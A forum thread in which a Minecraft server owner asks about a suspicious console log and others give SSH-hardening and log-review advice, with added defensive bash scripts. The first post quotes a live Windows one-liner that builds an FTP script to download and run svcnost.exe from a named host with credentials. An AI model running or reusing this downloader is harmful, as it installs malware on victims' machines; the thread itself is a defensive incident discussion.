
Kiddy Script attempt


4 replies to this topic

#1

Neko22

Posted 22 March 2011 - 07:19 PM

Hey guys,
Sorry I did try looking for a similar post but I couldn't find anything.
I run a small private Linux server on my Acer Revo R3700 (ace little thing btw!), with CraftBukkit installed and the Dynmap plugin running. Just got back recently and noticed this little gem on my Minecraft command prompt logs:

>
17:28:06 [INFO] Unknown console command. Type "help" for help.
>7~
17:28:10 [INFO] Unknown console command. Type "help" for help.
>
17:28:13 [INFO] Unknown console command. Type "help" for help.
>cmd /c echo open cCTeamFtp.yi.org 21 >> ik &echo user ccteam10 765824 >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit
17:28:38 [INFO] Unknown console command. Type "help" for help.
>echo You got owned
17:28:42 [INFO] Unknown console command. Type "help" for help.
>
17:28:44 [INFO] Unknown console command. Type "help" for help.

Now, I'm quite new at Linux (only been playing around with it for a couple of weeks now), but I googled it and found out that they were attempting to FTP up a dodgy file, but I really have two questions:

1) Will this have done any damage to my server? I'm not running FTP or anything, so I'm 99% sure this did nothing as it was run inside minecraft, but if they managed to get into here, they must have been able to hijack my user surely?
2) Does anyone have an idea how they got in in the first place, and how I can stop them doing so again?

I've closed down several of the ports that I think might have had a part to play in it (an external SSH port and a couple others), but if anyone has any advice I am all ears, so to speak.

If anyone needs more info from me, I will be happy to provide.

Cheers guys, and oh! First Post!
- Neko22


#2

endofzero

Posted 22 March 2011 - 09:56 PM

The good: That was a Windows attack... so it wouldn't have an effect on your Linux box. (But the FTP command will work even if you don't have an FTP server running; it's just a transfer protocol. So IF it worked, the files would have still gotten through.)

However, I would suggest you take a look at your logs.

Where did you see that? When you opened your console, or in server.log?

If it's in the console, you need to take some steps to protect yourself.

0) DON'T use the root account to run minecraft.

1) For fuck's sake... DISABLE ROOT LOGIN for SSH if not already done. If you really need root, you can use 'su' from your user account.

2) Disable all non-used user accounts, and create very secure passwords for the ones that remain open, lest you find them broken into using a standard brute force attack.

3) You can keep SSH, but I highly recommend changing the port to something other than any commonly used port... 14242, or some shit. Just be sure you are using the '-p ' flag when sshing into your box from a term. This will help deter automated scripts that get a hold of your IP from running brute force attacks on your server.

4) Verify if you are being attacked by looking at your logs... In Debian and like flavors, you can find them in /var/log/
You can do a few things here... actively tail your auth.log file via 'tail -f auth.log' or you can throw the last few thousand lines into another file so you can take a gander: 'tail -n 2500 auth.log >> ~/access_log.txt'
MC Sheller - Automated Shell Script git - MC Log Parser - Hub

Lulz

MoonBeans said:

As far as I've heard, Sk89q is a virus. Not sure though!
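
An added example (not part of endofzero's post) of the auth.log review suggested in step 4: it counts failed SSH password attempts per source address and lists successful logins that were either made as root or came from an address that also produced failures. The log lines, host name and addresses are constructed; the line layout assumed is OpenSSH's usual "Failed password for ... from <ip> port <n>" format.

```bash
#!/usr/bin/env bash
# Added example. The log lines are constructed (documentation IP ranges and a
# made-up host name); on a real Debian box pipe in /var/log/auth.log instead.
sample_auth_log() {
cat <<'EOF'
Mar 22 17:01:10 revo sshd[2101]: Failed password for root from 203.0.113.7 port 40122 ssh2
Mar 22 17:01:12 revo sshd[2101]: Failed password for root from 203.0.113.7 port 40122 ssh2
Mar 22 17:01:15 revo sshd[2104]: Failed password for invalid user admin from 203.0.113.7 port 40130 ssh2
Mar 22 17:02:40 revo sshd[2110]: Failed password for neko from 198.51.100.23 port 51514 ssh2
Mar 22 17:03:02 revo sshd[2113]: Accepted password for neko from 198.51.100.23 port 51520 ssh2
Mar 22 17:27:55 revo sshd[2150]: Accepted password for root from 203.0.113.7 port 40188 ssh2
EOF
}

# Shared awk helper: index of the "from" token that precedes "<ip> port <n>",
# searched from the end of the line so odd user names cannot shift the fields.
AWK_SRC='function src(  i) {
    for (i = NF - 2; i > 1; i--) { if ($i == "from" && $(i + 2) == "port") return i }
    return 0
}'

# Print "count ip" for every source with at least $1 (default 3) failures.
failed_by_ip() {
    awk -v t="${1:-3}" "$AWK_SRC"'
        / sshd\[[0-9]+\]: Failed password for / && (f = src()) { n[$(f + 1)]++ }
        END { for (ip in n) if (n[ip] >= t) print n[ip], ip }' | sort -rn
}

# Print "user ip failures=N" for successful logins made as root, or made from
# an address that also failed at least once (a typo, or a guess that worked).
suspicious_logins() {
    awk "$AWK_SRC"'
        !(f = src())            { next }
        / Failed password for / { fail[$(f + 1)]++ }
        / Accepted [^ ]+ for /  { user[++k] = $(f - 1); ip[k] = $(f + 1) }
        END {
            for (j = 1; j <= k; j++) {
                if (user[j] == "root" || fail[ip[j]] > 0)
                    print user[j], ip[j], "failures=" fail[ip[j]] + 0
            }
        }'
}
```

On a live system the same functions read the real file, for example `failed_by_ip 10 < /var/log/auth.log`.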

#3

thezlog

Posted 22 March 2011 - 11:01 PM

I'm not gonna lie, you make it sound like Minecraft would let someone force feed files via FTP onto Windows machines... and if that's the case I am gonna be waiting for Notch to make a post about how he is going to attempt to prevent it...

#4

endofzero

Posted 23 March 2011 - 12:06 AM

thezlog said:

I'm not gonna lie, you make it sound like Minecraft would let someone force feed files via FTP onto Windows machines... and if that's the case I am gonna be waiting for Notch to make a post about how he is going to attempt to prevent it...

Well... that's not true... the code was probably sent via automation.... if you look at that command, you can see it uses 'cmd' which means it is probably trying to start it using the 'Run...' command of Windows... His information is limited, so we don't know how he found that info on his server. None of those commands would ever work from the Minecraft console as it's just not designed that way...

hence all of the "[INFO] Unknown console command. Type "help" for help." shit.

Given his description, that may have occurred because he just didn't secure his server correctly and someone brute forced his system to get in. THIS is why people that think they can just start up a server get so fucked over when they start advertising their IP to the world.

You are freaking out from basic lack of knowledge in that area, just stop...
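
An added example (not part of the thread) that checks the point made in this post against a console capture: it pairs each typed line with the server's reply and reports whether any input that looks like an operating-system command was answered with something other than "Unknown console command". The capture is constructed to mirror the layout in the first post, with a placeholder host name and a shortened command; the `list` reply and the keyword list used for classification are assumptions.

```bash
#!/usr/bin/env bash
# Added example. The console capture below is constructed: it mirrors the
# layout of the log in the first post (">" plus the typed line, then the
# server's reply) with a placeholder host name and a shortened command.
sample_console() {
cat <<'EOF'
>
17:28:06 [INFO] Unknown console command. Type "help" for help.
>cmd /c echo open ftp.example.invalid 21 >> ik &ftp -n -v -s:ik &del ik &exit
17:28:38 [INFO] Unknown console command. Type "help" for help.
>echo You got owned
17:28:42 [INFO] Unknown console command. Type "help" for help.
>list
17:29:05 [INFO] Connected players: steve
EOF
}

# One line per typed input: "<time> <REJECTED|ACCEPTED> <kind> <input>".
# kind is "os-shell" when the input looks like an operating-system command
# line rather than a game command, i.e. text aimed at a shell ended up on the
# Minecraft console's stdin. ACCEPTED only means "not answered with Unknown
# console command".
triage_console() {
    awk '
        /^>/ { input = substr($0, 2); pending = 1; next }
        pending && /^[0-9:]+ \[INFO\] / {
            verdict = ($0 ~ /Unknown console command/) ? "REJECTED" : "ACCEPTED"
            kind = "game"
            if (input == "") kind = "empty"
            else if (input ~ /^(cmd|ftp|del|echo|sh|wget|curl)( |$)|\.exe/) kind = "os-shell"
            print $1, verdict, kind, input
            pending = 0
        }'
}

# Inputs that look like OS commands AND were not rejected. Empty output means
# the console refused every one of them.
executed_os_commands() {
    triage_console | awk '$2 == "ACCEPTED" && $3 == "os-shell"'
}
```

A clean result here only covers the Minecraft console; how the text reached the console's stdin is a separate question answered by the system's own login records.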

#5

Neko22

Posted 23 March 2011 - 10:09 PM

Thanks guys for your help, I've done all the things you suggested so I think I'm a little bit safer now.
I couldn't see anything in the logs per se, but I no doubt missed something. In any case I think the hole is closed now.

I think I'm going to go read up some more now... :iapprove: